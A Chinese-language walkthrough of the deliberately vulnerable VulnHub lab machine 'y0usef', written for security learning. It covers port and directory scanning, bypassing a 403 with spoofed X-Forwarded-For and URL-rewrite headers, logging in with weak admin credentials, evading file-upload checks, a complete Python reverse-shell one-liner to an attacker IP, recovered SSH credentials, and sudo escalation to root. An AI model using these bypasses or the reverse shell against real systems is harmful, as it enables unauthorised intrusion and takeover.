y0usef(vulnhub)

难度不高,学习到的知识很基础
https://www.vulnhub.com/entry/y0usef-1,624/

目录

1.主机发现

arp-scan -l

2.端口扫描

nmap -p 1-65535 -A 192.168.56.107  -A 强力扫描 直接能发现服务
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)OS details: Linux 3.2 - 4.9

3.漏洞发现

进入网页,没有什么信息,直接上工具,使用whatweb和dirsearch。

whatweb  http://192.168.56.107Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.56.107], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]dirsearch -u IP
301 /adminstration  ->  http://192.168.56.107/adminstration/

访问抓包看看。

403就该放弃了吗?继续尝试!

403Bypass利用方法

1. 旁站绕过的方式:
HOST可以更改,使用域内的主机名,说不定能够绕过2. 通过覆盖URL:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
--》把这个修改成
GET / HTTP/1.1    这里换成根路径
//X-Original-URL:/adminstration   这里换成要访问的   头部还有
//X-Rewrite-URL:/adminstration    把url重写成要访问的url3.通过请求头的方法:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
--》
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
Referer:https://192.168.56.107/adminstration4.以X开头的HTTP头部
X-Originating-IP:127.0.0.1
X-Remote-IP:127.0.0.1
X-forwarded-For:127.0.0.1

尝试尝试
然后你会发现进去了,但是尝试输入账号时,还会403。。所以每次都得加上头部信息。

居然就是弱口令admin,admin。

然后点点页面。还是得加上X-Forwarded-For:127.0.0.1,有个文件上传。

简单说一下绕过的基本方法:

文件扩展名
Content-Type:image/png  jpeg  都尝试下
代码内容中添加GIF89a或者PNG

这里文件上传使用image/png就行了

上传成功去链接:地址就是再上传点URL直接拼接。

打开虚拟终端。查找下存在不存在python环境,可以尝试反弹shell.不反弹也可以,蚁剑上可以正常使用,如果想要反弹shell的话可以使用python代码

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

那就去看看文件,查看下flag,但是突然觉得这不只是flag,还可能是base64加密的

解密得到信息

ssh :
user : yousef
pass : yousef123

4.提权


登录后看看信息:发现了sudo-l可以,还是ALL

直接sudo su或者sudo -s 切换到root身份

y0usef(vulnhub)相关推荐

  1. 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!

    Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...

  2. Vulnhub靶机渗透之 RAVEN: 1

    目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...

  3. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  4. 【Vulnhub靶机系列】DC2

    基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...

  5. 【Vulnhub靶机系列】DC1

    基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...

  6. 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞

    JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...

  7. 靶场练习第二十二天~vulnhub靶场之Momentum-2

    一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...

  8. 靶场练习第二十五天~vulnhub靶场之Raven-2

    一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...

  9. 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

    一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...

最新文章

  1. ORACLE DBA的职责
  2. linux——DHCP的配置问题
  3. spring BeanPostProcessor,BeanFactoryPostProcessor作用
  4. MySQL数据库之-foreign key 外键(一对多、多对多、一对一)、修改表、复制表
  5. 优酷世博频道上线 拍客牛人导航上海世博
  6. Oracle按用户进行统计信息更新
  7. AtCoder Regular Contest 100 E - Or Plus Max Sos dp
  8. vue项目实践教程1:vux项目搭建和简介
  9. 洛谷P2463 [SDOI2008]Sandy的卡片(后缀数组SA + 差分 + 二分答案)
  10. python批量打印机excel_python批量设置多个Excel文件页眉页脚的脚本
  11. Java selenium 读取网页
  12. [SAP ABAP开发技术总结]ABAP调优——Open SQL优化
  13. Python——Selenium Chrome Driver配置
  14. android NDK 详解
  15. /usr/bin/ld: cannot find Scrt1.o: No such file or directory
  16. 4.3 CMMI4级——定量项目管理(Quatitative Project Management)
  17. 计算机图形学概论论文5000字,关于计算机图形学探究的论文
  18. 逆变H桥IGBT单管驱动+保护
  19. 学学习笔记:利用TCGA Assembler工具下载及处理数据
  20. docker Got permission denied while trying to connect

热门文章

  1. MySQL的主键,索引设置和添加
  2. html中input中加图片,css怎么在input中插图片
  3. 空间分析建模目的_房产测绘与二三维一体化建模研究——以连云港市为例
  4. bzoj5185 [Usaco2018 Jan]Lifeguards
  5. 【图片新闻】低空穿越的美军MC-130J突击队II特种作战运输机
  6. HDU - 1873
  7. MIT 心拍类型注释
  8. 区块链技术涉及哪些编程语言?
  9. SpringBoot 雪花算法生成商品订单号【SpringBoot系列13】
  10. java get方法_java get方法